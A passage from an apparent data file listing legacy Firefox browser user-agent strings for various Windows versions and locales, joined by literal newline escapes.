Firefox/2.0.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8b5) Gecko/20051006 Firefox/1.4.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17\nMozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729; .NET4.0E)\nMozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.6) Gecko/20050321 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100503 Firefox/3.6.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.7.5) Gecko/20041119 Firefox/1.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.0 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4\nMozilla/5.0 (Windows; U; Windows NT 5.2; da; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.2; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-CA; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1b3pre) Gecko/20090105 Firefox/3.1b3pre\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 (.NET CLR 3.5.30729; .NET4.0E)\nMozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.0.04506.648)\nMozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5\nMozilla/5.0 (Windows; U; Windows NT 5.2; nl; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (Windows; U; Windows NT 5.2; nl; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5\nMozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11\nMozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.7.3) Gecko/20041001 Firefox/0.10.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11\nMozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6\nMozilla/5.0 (Windows; U; Windows NT 5.2; sk; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15\nMozilla/5.0 (Windows; U; Windows NT 5.2 x64; en-US; rv:1.9a1) Gecko/20060214 Firefox/1.6a1\nMozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.1.5) Gecko/Firefox/3.5.5\nMozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\nMozilla/5.0 (Windows; U; Windows NT 6.0; bg; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20\nMozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; de-AT; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 4.0.20506)\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.0.15) Gecko/2009101601 Firefox 2.1 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/2.0.0.15\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.0 (.NET CLR 3.0.30618)\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.13) Gecko/20101203 Firefox/3.5.9 (de)\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20\nMozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729) FirePHP/0.3\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 4.0.20506)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.15) Gecko/20110303 AskTbBT4/3.11.3.15590 Firefox/3.6.15 (.NET CLR 3.5.30729; .NET4.0C)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 (.NET CLR 3.5.30729; .NET4.0E)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 (.NET CLR 3.5.30729; .NET CLR 4.0.20506)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.10pre) Gecko/20070207 Firefox/1.5.0.10pre\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en_US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.7\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 GTB5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.5.12\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.16) Gecko/20101130 MRA 5.4 (build 02647) Firefox/3.5.16 (.NET CLR 3.5.30729; .NET4.0C)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.21022; .NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729) FirePHP/0.4\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b2) Gecko/20081127 Firefox/3.1b1\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b3) Gecko/20090405 Firefox/3.1b3\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 (.NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET CLR 3.5.21022)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3\nMozilla/5.0 (Windows; U; Windows NT 6.0; es-AR; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3\nMozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; es-MX; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.1b1) Gecko/20081007 Firefox/3.1b1\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5\nMozilla/5.0 (Windows; U; Windows NT 6.0; hu; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20\nMozilla/5.0 (Windows; U; Windows NT 6.0; id; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; it-IT; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\nMozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2\nMozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 GTB6\nMozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6\nMozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB7.1 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4\nMozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20\nMozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2) Gecko/20100115 Firefox/3.6\nMozilla/5.0 (Windows; U; Windows NT 6.0; sr; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12\nMozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15\nMozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2\nMozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\nMozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\nMozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre\nMozilla/5.0 (Windows; U; Windows NT 6.0; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre\nMozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4\nMozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 GTB7.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20\nMozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18\nMozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6\nMozilla/5.0 (Windows; U; Windows NT 6.1; ca; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; de-AT; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2\nMozilla/5.0 (Windows; U; Windows NT 6.1; de-DE; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 (.NET CLR 3.5.30729; .NET4.0C)\nMozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.16) Gecko/20101130 AskTbMYC/3.9.1.14019 Firefox/3.5.16\nMozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3\nMozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 4.0.20506)\nMozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3) Gecko/20121221 Firefox/3.6.8\nMozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-AU; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729; .NET4.0C)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 GTB5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) FirePHP/0.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 FirePHP/0.4\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 